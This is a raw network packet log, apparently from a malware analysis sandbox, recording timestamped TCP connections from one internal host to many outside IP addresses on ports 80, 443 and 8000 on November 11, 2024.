                                                                                                                                                                                                          Nov 11, 2024 18:24:12.187930107 CET497288000192.168.2.8106.15.232.163
                                                                                                                                                                                                          Nov 11, 2024 18:24:12.189264059 CET4972680192.168.2.8103.150.10.48
                                                                                                                                                                                                          Nov 11, 2024 18:24:12.194828987 CET8049726103.150.10.48192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:12.460268021 CET8049726103.150.10.48192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:12.460365057 CET4972680192.168.2.8103.150.10.48
                                                                                                                                                                                                          Nov 11, 2024 18:24:12.462639093 CET497288000192.168.2.8106.15.232.163
                                                                                                                                                                                                          Nov 11, 2024 18:24:12.467670918 CET800049728106.15.232.163192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:12.730094910 CET800049728106.15.232.163192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:12.730266094 CET497288000192.168.2.8106.15.232.163
                                                                                                                                                                                                          Nov 11, 2024 18:24:13.477895975 CET44349727188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:13.477967024 CET44349727188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:13.478007078 CET49727443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:13.478013992 CET44349727188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:13.478022099 CET44349727188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:13.478049040 CET49727443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:13.478096008 CET49727443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:13.478106976 CET44349727188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:13.478161097 CET44349727188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:13.478163004 CET49727443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:13.478176117 CET44349727188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:13.478254080 CET49727443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:13.478260040 CET44349727188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:13.478338957 CET49727443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:13.478358984 CET44349727188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:13.478451014 CET49727443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:13.478791952 CET44349727188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:13.479054928 CET49727443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:13.480528116 CET49727443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:13.480578899 CET44349727188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:13.480581999 CET49727443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:13.480679989 CET49727443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:13.482103109 CET4972380192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:13.487224102 CET8049723188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:13.833827972 CET8049723188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:13.833839893 CET8049723188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:13.833911896 CET4972380192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:13.839926004 CET49729443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:13.839963913 CET44349729188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:13.840097904 CET49729443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:13.840393066 CET49729443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:13.840408087 CET44349729188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:14.290530920 CET44349729188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:14.290615082 CET49729443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:14.293384075 CET49729443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:14.293400049 CET44349729188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:14.293641090 CET44349729188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:14.293706894 CET49729443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:14.294126034 CET49729443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:14.339344978 CET44349729188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:15.560460091 CET8049710199.59.243.227192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:15.562294960 CET4971080192.168.2.8199.59.243.227
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.088090897 CET44349729188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.088157892 CET44349729188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.088181973 CET49729443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.088202000 CET44349729188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.088217974 CET49729443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.088247061 CET44349729188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.088283062 CET44349729188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.088294983 CET49729443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.088294983 CET49729443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.088301897 CET44349729188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.088340998 CET49729443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.088340998 CET49729443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.088351965 CET44349729188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.088399887 CET49729443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.088444948 CET44349729188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.088511944 CET49729443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.088613033 CET49729443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.088624954 CET44349729188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.088638067 CET49729443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.088671923 CET49729443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.174115896 CET4973080192.168.2.876.223.67.189
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.179171085 CET804973076.223.67.189192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.179239988 CET4973080192.168.2.876.223.67.189
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.179394007 CET4973080192.168.2.876.223.67.189
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.184340000 CET804973076.223.67.189192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.217994928 CET4973180192.168.2.864.225.91.73
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.223115921 CET804973164.225.91.73192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.223196030 CET4973180192.168.2.864.225.91.73
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.223375082 CET4973180192.168.2.864.225.91.73
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.228265047 CET804973164.225.91.73192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.338313103 CET4973280192.168.2.844.221.84.105
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.343272924 CET804973244.221.84.105192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.343372107 CET4973280192.168.2.844.221.84.105
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.343624115 CET4973280192.168.2.844.221.84.105
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.348493099 CET804973244.221.84.105192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.452958107 CET4973380192.168.2.8103.224.212.210
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.457931042 CET8049733103.224.212.210192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.458003044 CET4973380192.168.2.8103.224.212.210
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.464354038 CET4973480192.168.2.8103.224.182.252
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.469773054 CET8049734103.224.182.252192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.469841003 CET4973480192.168.2.8103.224.182.252
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.469979048 CET4973480192.168.2.8103.224.182.252
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.471121073 CET4973380192.168.2.8103.224.212.210
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.475387096 CET8049734103.224.182.252192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.475869894 CET8049733103.224.212.210192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.605503082 CET804973076.223.67.189192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.605566025 CET4973080192.168.2.876.223.67.189
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.615822077 CET4973580192.168.2.8154.85.183.50
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.620764971 CET8049735154.85.183.50192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.620845079 CET4973580192.168.2.8154.85.183.50
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.621033907 CET4973580192.168.2.8154.85.183.50
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.626010895 CET8049735154.85.183.50192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.769535065 CET804973164.225.91.73192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.769592047 CET4973180192.168.2.864.225.91.73
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.770819902 CET804973244.221.84.105192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.770884991 CET4973280192.168.2.844.221.84.105
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.773509026 CET4973280192.168.2.844.221.84.105
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.781380892 CET804973244.221.84.105192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.781440020 CET4973280192.168.2.844.221.84.105
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.039020061 CET8049733103.224.212.210192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.039103031 CET4973380192.168.2.8103.224.212.210
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.041501999 CET4973380192.168.2.8103.224.212.210
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.047257900 CET8049733103.224.212.210192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.047348022 CET4973380192.168.2.8103.224.212.210
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.050568104 CET8049734103.224.182.252192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.050760984 CET4973480192.168.2.8103.224.182.252
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.081741095 CET4973480192.168.2.8103.224.182.252
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.087781906 CET8049734103.224.182.252192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.087868929 CET4973480192.168.2.8103.224.182.252
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.091077089 CET4973680192.168.2.864.190.63.136
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.095997095 CET804973664.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.096116066 CET4973680192.168.2.864.190.63.136
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.096453905 CET4973680192.168.2.864.190.63.136
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.101663113 CET804973664.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.414400101 CET4973780192.168.2.8199.59.243.227
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.421188116 CET8049737199.59.243.227192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.421268940 CET4973780192.168.2.8199.59.243.227
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.421536922 CET4973780192.168.2.8199.59.243.227
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.427323103 CET8049737199.59.243.227192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.440803051 CET8049735154.85.183.50192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.440886974 CET4973580192.168.2.8154.85.183.50
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.445523977 CET4973580192.168.2.8154.85.183.50
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.450692892 CET8049735154.85.183.50192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.721149921 CET804973664.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.721231937 CET804973664.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.721242905 CET804973664.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.721306086 CET4973680192.168.2.864.190.63.136
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.721307039 CET804973664.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.721314907 CET804973664.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.721333981 CET804973664.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.721364021 CET804973664.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.721371889 CET804973664.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.721391916 CET4973680192.168.2.864.190.63.136
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.721395969 CET804973664.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.721406937 CET804973664.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.721420050 CET4973680192.168.2.864.190.63.136
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.721452951 CET4973680192.168.2.864.190.63.136
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.726254940 CET804973664.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.726277113 CET804973664.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.726288080 CET804973664.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.726407051 CET4973680192.168.2.864.190.63.136
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.731031895 CET8049735154.85.183.50192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.731101036 CET4973580192.168.2.8154.85.183.50
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.809765100 CET804973664.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.809779882 CET804973664.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.809792042 CET804973664.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.809842110 CET4973680192.168.2.864.190.63.136
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.809875965 CET4973680192.168.2.864.190.63.136
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.809916019 CET804973664.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.809922934 CET804973664.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.809931993 CET804973664.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.809940100 CET804973664.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.809950113 CET804973664.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.809963942 CET4973680192.168.2.864.190.63.136
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.809995890 CET4973680192.168.2.864.190.63.136
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.810672045 CET804973664.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.810681105 CET804973664.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.810688972 CET804973664.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.810760021 CET4973680192.168.2.864.190.63.136
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.873805046 CET8049737199.59.243.227192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.873831987 CET8049737199.59.243.227192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.873935938 CET4973780192.168.2.8199.59.243.227
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.361911058 CET4973980192.168.2.864.225.91.73
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.366890907 CET804973964.225.91.73192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.366977930 CET4973980192.168.2.864.225.91.73
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.367106915 CET4973980192.168.2.864.225.91.73
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.371901035 CET804973964.225.91.73192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.584486008 CET4974180192.168.2.872.52.179.174
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.589396000 CET804974172.52.179.174192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.589481115 CET4974180192.168.2.872.52.179.174
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.589803934 CET4974180192.168.2.872.52.179.174
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.594873905 CET804974172.52.179.174192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.913028002 CET804973964.225.91.73192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.913088083 CET4973980192.168.2.864.225.91.73
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.113225937 CET804974172.52.179.174192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.113296986 CET4974180192.168.2.872.52.179.174
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.113651037 CET4974180192.168.2.872.52.179.174
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.116235971 CET4974280192.168.2.872.52.179.174
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.118506908 CET804974172.52.179.174192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.121090889 CET804974272.52.179.174192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.121165991 CET4974280192.168.2.872.52.179.174
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.121463060 CET4974280192.168.2.872.52.179.174
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.126674891 CET804974272.52.179.174192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.613109112 CET804974272.52.179.174192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.613185883 CET4974280192.168.2.872.52.179.174
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.613306999 CET4974280192.168.2.872.52.179.174
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.618271112 CET804974272.52.179.174192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.950022936 CET5359880192.168.2.852.34.198.229
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.955125093 CET805359852.34.198.229192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.955209970 CET5359880192.168.2.852.34.198.229
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.955452919 CET5359880192.168.2.852.34.198.229
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.961224079 CET805359852.34.198.229192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.641503096 CET805359852.34.198.229192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.641586065 CET5359880192.168.2.852.34.198.229
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.643870115 CET5359880192.168.2.852.34.198.229
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.649458885 CET805359852.34.198.229192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.649555922 CET5359880192.168.2.852.34.198.229
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.811197042 CET804973664.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.811285019 CET4973680192.168.2.864.190.63.136
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.959465981 CET5935780192.168.2.844.221.84.105
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.964469910 CET805935744.221.84.105192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.964596987 CET5935780192.168.2.844.221.84.105
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.964730024 CET5935780192.168.2.844.221.84.105
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.969575882 CET805935744.221.84.105192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.392695904 CET805935744.221.84.105192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.392786026 CET5935780192.168.2.844.221.84.105
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.394582987 CET5935780192.168.2.844.221.84.105
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.399786949 CET805935744.221.84.105192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.399837017 CET5935780192.168.2.844.221.84.105
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.826956987 CET4971080192.168.2.8199.59.243.227
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.827405930 CET6320580192.168.2.8199.59.243.227
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.829626083 CET4971180192.168.2.8208.100.26.245
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.832192898 CET8049710199.59.243.227192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.832246065 CET8063205199.59.243.227192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.832560062 CET6320580192.168.2.8199.59.243.227
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.834856987 CET8049711208.100.26.245192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.854317904 CET6320580192.168.2.8199.59.243.227
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.859219074 CET8063205199.59.243.227192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.891175032 CET6320680192.168.2.823.253.46.64
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.891479015 CET6320780192.168.2.885.17.31.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.896559954 CET806320623.253.46.64192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.896636009 CET6320680192.168.2.823.253.46.64
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.896898985 CET806320785.17.31.82192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.897006035 CET6320680192.168.2.823.253.46.64
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.897037983 CET6320780192.168.2.885.17.31.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.897295952 CET6320780192.168.2.885.17.31.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.901854038 CET806320623.253.46.64192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.902086973 CET806320785.17.31.82192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.932585001 CET8049711208.100.26.245192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.934349060 CET4971180192.168.2.8208.100.26.245
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.994374990 CET4971180192.168.2.8208.100.26.245
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.999351025 CET8049711208.100.26.245192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.016472101 CET4970980192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.021425962 CET8049709188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.030268908 CET6320880192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.035939932 CET806320875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.036010027 CET6320880192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.036457062 CET6320880192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.038609028 CET4970780192.168.2.8154.212.231.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.041280031 CET806320875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.043508053 CET8049707154.212.231.82192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.365720034 CET8049711208.100.26.245192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.365768909 CET4971180192.168.2.8208.100.26.245
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.368000031 CET8063205199.59.243.227192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.368007898 CET8063205199.59.243.227192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.368010998 CET8049711208.100.26.245192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.368014097 CET806320785.17.31.82192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.368019104 CET8063205199.59.243.227192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.368032932 CET806320623.253.46.64192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.368045092 CET806320623.253.46.64192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.368074894 CET4971180192.168.2.8208.100.26.245
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.368088007 CET6320580192.168.2.8199.59.243.227
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.368144035 CET6320680192.168.2.823.253.46.64
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.368144035 CET6320780192.168.2.885.17.31.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.368405104 CET6320780192.168.2.885.17.31.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.369395018 CET6320680192.168.2.823.253.46.64
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.369415998 CET6320680192.168.2.823.253.46.64
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.373500109 CET806320785.17.31.82192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.379887104 CET6320980192.168.2.885.17.31.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.385932922 CET806320985.17.31.82192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.386049986 CET6320980192.168.2.885.17.31.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.386780977 CET6320980192.168.2.885.17.31.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.391639948 CET806320985.17.31.82192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.403179884 CET8049709188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.403259993 CET4970980192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.416181087 CET6321080192.168.2.823.253.46.64
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.421367884 CET806321023.253.46.64192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.421488047 CET6321080192.168.2.823.253.46.64
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.421636105 CET6321080192.168.2.823.253.46.64
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.425607920 CET8049707154.212.231.82192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.425745964 CET4970780192.168.2.8154.212.231.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.426600933 CET806321023.253.46.64192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.462372065 CET806320875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.462423086 CET6320880192.168.2.875.2.71.199
